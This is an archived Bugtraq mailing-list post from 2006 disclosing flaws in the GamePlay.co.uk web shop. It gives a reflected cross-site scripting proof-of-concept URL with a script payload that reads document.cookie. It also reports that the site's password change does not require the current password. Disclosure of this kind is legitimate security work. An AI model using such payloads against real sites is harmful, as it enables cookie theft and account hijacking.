[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

GamePlay.co.uk XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: GamePlay.co.uk XSS
From: charlie@xxxxxxxxxxxxxxxxxxx
Date: 10 Jun 2006 00:57:52 -0000

Homepage: www.gameplay.co.uk

Example:
http://shop.gameplay.co.uk/webstore/advanced_search.asp?Keyword=&terms=!&badterm=<script>alert(document.cookie)</script>

Also...

The current password is not necessary for a successful password change for 
members of gameplay.co.uk which makes changing passwords through scripts as 
easy as tying your shoe lace.
(https://shop.gameplay.co.uk/gameplay/changepassword.asp)

I tried emailing these clowns about their silly flaws, but I had no joy.


Charlie.

Follow-Ups:
- Re: GamePlay.co.uk XSS
  - From: Patrick Morris

Prev by Date: iDefense Security Advisory 06.13.06: Windows Media Player PNG Chunk Decoding Stack-Based Buffer Overflow
Next by Date: PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path Disclosure and others
Previous by thread: iDefense Security Advisory 06.13.06: Windows Media Player PNG Chunk Decoding Stack-Based Buffer Overflow
Next by thread: Re: GamePlay.co.uk XSS
Index(es):
- Date
- Thread